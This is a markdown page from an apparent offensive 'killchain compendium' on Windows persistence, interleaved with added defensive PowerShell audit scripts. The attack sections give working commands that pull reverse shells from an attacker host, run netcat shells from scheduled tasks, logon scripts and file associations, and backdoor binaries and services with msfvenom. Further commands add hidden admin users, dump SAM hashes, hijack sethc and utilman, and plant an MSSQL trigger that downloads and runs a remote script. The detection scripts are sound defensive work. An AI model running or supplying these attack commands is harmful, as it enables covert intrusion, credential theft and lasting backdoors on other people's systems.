killchain-compendium/Persistence/persistence.md

Persistence

  • Gained through
    • Startup folder persistence
    • Editing registry keys
    • Scheduled tasks
    • SUID
    • BITS
    • Creating a backdoored service
    • Creating a user
    • RDP

Gain Persistence on Windows

Internet Explorer

Open Internet Explorer and add the attacker-controlled URL to the trusted sites zone. Files served from the now-trusted URL, such as a shell or any other file, can then be downloaded via the browser.

Powershell

Open Powershell and download the reverse shell via

Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe

CMD.exe

Open cmd.exe and download the reverse shell via

certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port>/shell.exe
  • In Metasploit use multi/handler on attacker and set PAYLOAD windows/meterpreter/reverse_tcp

Paths to Persistence

  • Put in startup directory
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • Put the reverse shell into %appdata% and add a registry key
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe" 

Background Intelligence Transfer Service (BITS)

BITS is a background service included in Windows that transfers data (files) between machines while the system is idle. The bitsadmin utility can be used directly from Powershell or cmd.exe to transfer malicious files.

bitsadmin /create __shell__
bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetNotifyCmdLine __shell__ cmd.exe "/c bitsadmin /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetMinRetryDelay __shell__ 30
bitsadmin /resume __shell__
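
The following is an added example for the defensive side of this section and is not part of the compendium: it enumerates BITS jobs for every user and flags jobs whose source host is not on an allowlist or whose destination sits under a user profile, which is where the job above drops its file. It assumes an elevated shell (Get-BitsTransfer -AllUsers needs one) and the built-in BitsTransfer module; the allowlist is constructed.

```powershell
# Added example, not from the compendium: audit BITS jobs on the host.
# Assumes an elevated shell and the BitsTransfer module; allowlist is constructed.

Import-Module BitsTransfer

$allowedHosts = @('download.windowsupdate.com', 'update.microsoft.com')   # constructed allowlist

Get-BitsTransfer -AllUsers | ForEach-Object {
    $job = $_
    foreach ($f in $job.FileList) {
        $remoteHost = ([uri]$f.RemoteName).Host
        $offList    = $allowedHosts -notcontains $remoteHost            # unknown download source
        $inProfile  = $f.LocalName -like "$env:SystemDrive\Users\*"     # dropped into a user profile
        [pscustomobject]@{
            JobName    = $job.DisplayName
            Owner      = $job.OwnerAccount
            State      = $job.JobState
            Remote     = $f.RemoteName
            Local      = $f.LocalName
            Suspicious = ($offList -or $inProfile)
        }
    }
} | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Get-BitsTransfer does not surface the notification command line that the /SetNotifyCmdLine step above sets; the verbose listing of bitsadmin /list /allusers does, so check that for any job the script flags. The Microsoft-Windows-Bits-Client/Operational event log records job creation with the owning account and is the place to look for a job that has already completed and been cleaned up.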

Elevate Privileges

Create a user via net user /add <user> <pass>. Add the user to the administrators group via net localgroup administrators <user> /add. Verify the result via net localgroup Administrators

More stealthy methods

The Backup Operators group is a stealthier choice than the administrators group. The following two privileges are assigned through membership of Backup Operators

  • SeBackupPrivilege, read files
  • SeRestorePrivilege, write files
net localgroup "Backup Operators" <user> /add
net localgroup "Remote Management Users" <user> /add

RDP

An RDP login gets special treatment: any local group is stripped of its admin permissions when logging in via RDP. Therefore disable this filtering by setting the following registry value via

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
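
As an added defensive example (not part of the compendium), the following script lists the members of the local groups this section relies on and reports whether remote UAC token filtering has been switched off through LocalAccountTokenFilterPolicy. It assumes Windows 10 / Server 2016 or later (the LocalAccounts module) and an elevated shell; the group list is the one discussed above.

```powershell
# Added example, not from the compendium: audit privileged local group
# membership and the LocalAccountTokenFilterPolicy value.
# Assumes Windows 10+/Server 2016+ and an elevated shell.

$groups = @('Administrators', 'Backup Operators', 'Remote Management Users', 'Remote Desktop Users')

$members = foreach ($g in $groups) {
    Get-LocalGroupMember -Group $g -ErrorAction SilentlyContinue |
        Select-Object @{ n = 'Group'; e = { $g } }, Name, ObjectClass, PrincipalSource
}
$members | Format-Table -AutoSize

# Remote UAC token filtering: absent or 0 is the default, 1 disables it.
$polKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$pol = Get-ItemProperty -Path $polKey -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue

if ($pol -and $pol.LocalAccountTokenFilterPolicy -eq 1) {
    Write-Warning 'LocalAccountTokenFilterPolicy = 1: local accounts keep full admin tokens over remote logons'
} else {
    Write-Output 'LocalAccountTokenFilterPolicy absent or 0: remote UAC token filtering is in effect'
}
```

Run this periodically and diff the output against a baseline; a new member in Backup Operators or Remote Management Users is the quiet change this section describes. Security event 4732 (a member was added to a security-enabled local group) gives the same information with a timestamp and the account that made the change.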

Afterwards, check whether Backup Operators shows up in whoami /groups. Back up SAM and SYSTEM via

reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
secretsdump.py -sam sam.bak -system system.bak LOCAL

Hashes found in the dump can be used for pass-the-hash via evil-winrm

secedit

  • Get r/w on files through editing a security configuration file
  • Export the security configuration with secedit and open it
secedit /export /cfg config.inf
  • Add the user to the privilege lines
SeBackupPrivilege = [...],<username>
SeRestorePrivilege = [...],<username>
  • Convert the file and apply it
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf
  • Add the user to the RDP group via net localgroup like before or do
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
  • Add & click the user -> Full Control (All Operations)
  • Set LocalAccountTokenFilterPolicy to 1 like in the section before

Relative ID (RID)

  • Comparable to a UID on Linux
    • Administrator has RID = 500
    • Other interactive users have RID >= 1000
  • Get RIDs
 wmic useraccount get name,sid
  • Assign 500 to a regular user
 PsExec64.exe -i -s regedit
  • Open HKLM\SAM\SAM\Domains\Account\Users\<0xRID>
  • Search for the user's RID as a hexadecimal subkey name
  • Open the value called F and change the effective RID at offset 0x30
  • Insert the little-endian hex of decimal 500, which is f4 01

Add to registry

  • Execute on user logon via
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f

Add a Service

Meterpreter

  • Inside meterpreter run load powershell, then powershell_shell
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"

Powershell

  • Start a service automatically
sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
sc.exe start SteamUpdater
  • Use a service PE instead
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
  • Modify an existing service
    • Enumerate all the services
sc.exe query state= all
    • Info about a specific service; the start type should be automatic and the service start name should be the target user
sc.exe qc <ServiceName>
    • Reconfigure
sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
sc.exe start FoundService
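
The following added example (not from the compendium) audits auto-start services for the two patterns the sc.exe commands above produce: a binPath that is a command line rather than a service executable, and a binary that lives outside the Windows directory or is unsigned. It reads Win32_Service, which any Windows 10 / Server host exposes without elevation; the keyword heuristics are constructed.

```powershell
# Added example, not from the compendium: flag auto-start services with
# suspicious binPath values. Reads Win32_Service; heuristics are constructed.

$services = Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.StartMode -eq 'Auto' }

foreach ($s in $services) {
    $path = $s.PathName

    # Extract the executable: a quoted path, or the first token before arguments.
    if     ($path -match '^"([^"]+)"') { $exe = $Matches[1] }
    elseif ($path -match '^(\S+)')     { $exe = $Matches[1] }
    else                               { $exe = $path }

    $outsideWindows = $exe -notlike "$env:SystemRoot\*"
    $notAnExe       = $exe -notmatch '\.exe$'
    $commandLike    = $path -match '\b(net|cmd|powershell|schtasks)\b'   # constructed keyword list
    $sig            = Get-AuthenticodeSignature -FilePath $exe -ErrorAction SilentlyContinue
    $unsigned       = $sig.Status -ne 'Valid'   # also true when the file does not exist

    $reasons = @()
    if ($outsideWindows) { $reasons += 'outside SystemRoot' }
    if ($notAnExe)       { $reasons += 'binPath is not an .exe' }
    if ($commandLike)    { $reasons += 'command line in binPath' }
    if ($unsigned)       { $reasons += 'unsigned or missing binary' }

    if ($reasons.Count -gt 0) {
        [pscustomobject]@{
            Name      = $s.Name
            StartName = $s.StartName
            State     = $s.State
            PathName  = $path
            Reason    = ($reasons -join ', ')
        }
    }
}
```

The "net user" service above trips every check at once; the exe-service payload placed in C:\Windows trips only the signature check, which is why that check is worth the extra time it costs. Services whose StartName is LocalSystem and whose Reason is non-empty deserve the first look.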

Add Scheduled Task

$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Administrator\Documents\rshell.exe"
$B = New-ScheduledTaskTrigger -AtLogOn
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY\SYSTEM" -RunLevel Highest
$D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask -TaskName ReverseShell -InputObject $E
  • Alternatively via schtasks
schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM
    • Check the task
schtasks /query /tn SteamUpdater
  • Deleting the security descriptor of a task makes it invisible. Delete the following registry value
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<taskname>\SD
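
An added detection example for the SD trick above (not part of the compendium): it walks the TaskCache Tree key and reports every task entry that either has no SD value or does not appear in Get-ScheduledTask output, which is exactly the gap a task with a deleted security descriptor falls into. It assumes an elevated shell, since the Tree key is not readable by standard users.

```powershell
# Added example, not from the compendium: find scheduled tasks hidden by a
# missing SD value. Assumes an elevated shell.

$tree    = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'
$visible = (Get-ScheduledTask).TaskName

Get-ChildItem -Path $tree -Recurse | ForEach-Object {
    $props = Get-ItemProperty -Path $_.PSPath
    # Folder keys in the tree carry no Id; only real task entries do.
    if (-not $props.Id) { return }

    $taskName = $_.PSChildName
    [pscustomobject]@{
        Task   = $_.Name -replace '^.*\\Tree', ''   # path relative to the tree root
        HasSD  = [bool]$props.SD
        Listed = ($visible -contains $taskName)
    }
} | Where-Object { -not $_.HasSD -or -not $_.Listed } | Format-Table -AutoSize
```

An empty result is the expected state. A task that is present in the registry but neither carries an SD nor shows up in the listing still runs on its trigger, so the Microsoft-Windows-TaskScheduler/Operational log is the second place to confirm what it has been doing.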

File Backdoor

Mimic PE

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe

Reference Script

  • Reuse the shortcut of an app to reference a reverse shell script
    • Right click -> Properties -> Target
  • Reference the script certainlynobackdoor.ps1 via
powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
  • Content of the script certainlynobackdoor.ps1
Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\System32\calc.exe

File Association

  • Change associated ProgID of a file type inside registry HKLM\Software\Classes\
  • Choose a class and <class>/shell/open/command contains the file to be opened as the first argument %1
  • Change the command to a shell script and pass the argument through it
Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\system32\NOTEPAD.EXE $args[0]
  • Change command\default to powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1

Persistence via Logon

Startup directories

  • Users' Startup directory under
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • Startup directory for all users, put the reverse shell here
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Registry Keys

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • Create an Expandable String Value under any of these keys with the path of the reverse shell as its data
  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ loads the user profile after authentication is done
    • Either the Shell or the Userinit value can have a comma-separated command appended

Logon Scripts

  • userinit.exe checks the variable UserInitMprLogonScript, which can be used to load logon scripts

  • Create variable UserInitMprLogonScript under HKCU\Environment which gets the reverse shell as a payload
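
The script below is an added example, not part of the compendium, that audits every logon persistence location named in the Startup directories, Registry Keys and Logon Scripts subsections at once: the four Run/RunOnce keys, the Winlogon Shell and Userinit values, the UserInitMprLogonScript variable and both startup folders. It assumes an elevated shell so the HKLM keys and the all-users folder are readable, that the Winlogon defaults are those of a stock install, and a constructed allowlist of Run entries.

```powershell
# Added example, not from the compendium: audit logon persistence locations.
# Assumes an elevated shell; the allowlist and Winlogon defaults are assumptions.

$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
$knownGood = @('SecurityHealth', 'OneDrive')   # constructed allowlist, tune per build

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*')            { continue }   # provider metadata, not a value
        if ($knownGood -contains $p.Name)   { continue }
        [pscustomobject]@{
            Location = $key
            Name     = $p.Name
            Kind     = (Get-Item $key).GetValueKind($p.Name)   # REG_EXPAND_SZ is the type used above
            Value    = $p.Value
        }
    }
}

# Winlogon: a comma-separated second entry after explorer.exe or userinit.exe is the tell.
$wl = Get-ItemProperty 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'
if ($wl.Shell -ne 'explorer.exe') {
    [pscustomobject]@{ Location = 'Winlogon'; Name = 'Shell'; Kind = 'String'; Value = $wl.Shell }
}
if ($wl.Userinit -notmatch '^C:\\Windows\\system32\\userinit\.exe,?$') {
    [pscustomobject]@{ Location = 'Winlogon'; Name = 'Userinit'; Kind = 'String'; Value = $wl.Userinit }
}

# Logon script variable: absent on a clean system, so any value is a finding.
$userEnv = Get-ItemProperty 'HKCU:\Environment' -ErrorAction SilentlyContinue
if ($userEnv.UserInitMprLogonScript) {
    [pscustomobject]@{ Location = 'HKCU:\Environment'; Name = 'UserInitMprLogonScript'; Kind = 'String'; Value = $userEnv.UserInitMprLogonScript }
}

# Startup folders: list every file so an unexpected executable stands out.
$startupDirs = @(
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
)
Get-ChildItem -Path $startupDirs -File -ErrorAction SilentlyContinue |
    Select-Object FullName, Length, LastWriteTime
```

The HKCU checks only cover the profile the script runs under; load each user's NTUSER.DAT, or run the script in every interactive session, to cover the other accounts on the machine.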

RDP or Login Screen

Sticky Keys

  • Press Shift five times and C:\Windows\System32\sethc.exe will be executed
  • Take ownership of the binary via
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
  • Overwrite with cmd.exe
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

Utilman

  • The Ease of Access button is clickable at the login screen, and utilman.exe is executed with SYSTEM privileges
  • Take ownership and overwrite with cmd.exe
takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
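
As an added defensive example (not from the compendium), the following script checks whether the accessibility binaries reachable from the logon screen are still what Windows shipped. It goes slightly beyond the two files named above and also covers the other logon-screen helpers. A copied cmd.exe keeps the hash and the OriginalFilename of cmd.exe, and the takeown step leaves the file owned by an administrator instead of TrustedInstaller, so those three properties are what it compares. It assumes Windows 10 or later.

```powershell
# Added example, not from the compendium: verify logon-screen accessibility
# binaries against cmd.exe and against the stock owner. Assumes Windows 10+.

$sys32   = "$env:SystemRoot\System32"
$targets = @('sethc.exe', 'utilman.exe', 'osk.exe', 'magnify.exe', 'narrator.exe', 'displayswitch.exe')
$cmdHash = (Get-FileHash -Path "$sys32\cmd.exe" -Algorithm SHA256).Hash

foreach ($name in $targets) {
    $path = Join-Path $sys32 $name
    if (-not (Test-Path $path)) { continue }

    $hash  = (Get-FileHash -Path $path -Algorithm SHA256).Hash
    $sig   = Get-AuthenticodeSignature -FilePath $path
    $orig  = (Get-Item $path).VersionInfo.OriginalFilename
    $owner = (Get-Acl -Path $path).Owner

    # A renamed cmd.exe is still catalog-signed, so the hash and OriginalFilename
    # comparisons carry the detection; the owner check catches takeown.
    $looksLikeCmd = ($hash -eq $cmdHash) -or ($orig -ieq 'cmd.exe')
    $intact = (-not $looksLikeCmd) -and ($sig.Status -eq 'Valid') -and ($owner -eq 'NT SERVICE\TrustedInstaller')

    [pscustomobject]@{
        File             = $name
        OriginalFilename = $orig
        Signature        = $sig.Status
        Owner            = $owner
        LooksLikeCmd     = $looksLikeCmd
        Intact           = $intact
    }
}
```

Do not rely on the Signature column alone: because cmd.exe is signed through the system catalog, a copy of it under another name still reports Valid. Intact is false for any file whose owner has changed, which is the state the takeown and icacls commands above leave behind even before the copy happens.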

Web Shell

  • Default user is iis apppool\defaultapppool

  • Has SeImpersonatePrivilege

  • Download Web Shell

  • Move shell to C:\inetpub\wwwroot on target

  • Get the shell via http://$TARGET_IP/shell.aspx

MSSQL

  • Triggers bind actions to events such as INSERTs

  • Open Microsoft SQL Server Management Studio

    • Choose windows auth
    • New Query
    • Enable advanced options via
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO

sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO
    • Grant privileges to all users
USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];
    • Change to the DB
USE <DATABASE>
    • Create the trigger
CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees 
FOR INSERT AS

EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
  • Fire the trigger by visiting a page on the site that performs the INSERT through a database call
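
The following added example (not part of the compendium) audits the three changes the MSSQL section makes from the defender's side: xp_cmdshell being enabled, IMPERSONATE granted on a login such as sa, and DML triggers whose body shells out or switches login context. It assumes the SqlServer PowerShell module (Invoke-Sqlcmd), a login with VIEW DEFINITION in the target database, and placeholder values for the instance and database names.

```powershell
# Added example, not from the compendium: audit xp_cmdshell, IMPERSONATE grants
# and suspicious triggers. Assumes the SqlServer module; names are placeholders.

$instance = 'SQLHOST\INSTANCE'   # placeholder, replace with the instance to audit
$database = 'HRDB'               # placeholder, database whose triggers to inspect

$query = @"
SELECT 'config' AS kind, name AS item, CAST(value_in_use AS nvarchar(10)) AS detail
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options')
UNION ALL
SELECT 'impersonate', grantee.name, 'on login ' + target.name
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals target  ON p.major_id = target.principal_id
WHERE p.class_desc = 'SERVER_PRINCIPAL' AND p.permission_name = 'IMPERSONATE'
UNION ALL
SELECT 'trigger',
       OBJECT_SCHEMA_NAME(t.parent_id) + '.' + OBJECT_NAME(t.parent_id) + ' / ' + t.name,
       LEFT(m.definition, 200)
FROM sys.triggers t
JOIN sys.sql_modules m ON t.object_id = m.object_id
WHERE m.definition LIKE '%xp_cmdshell%' OR m.definition LIKE '%EXECUTE AS%'
"@

Invoke-Sqlcmd -ServerInstance $instance -Database $database -Query $query | Format-Table -AutoSize
```

On a clean instance the config rows show 0 for both options and the other two queries return nothing. The trigger query is per-database, so run it against each database that matters; the configuration and permission rows are server-wide and identical whichever database is selected.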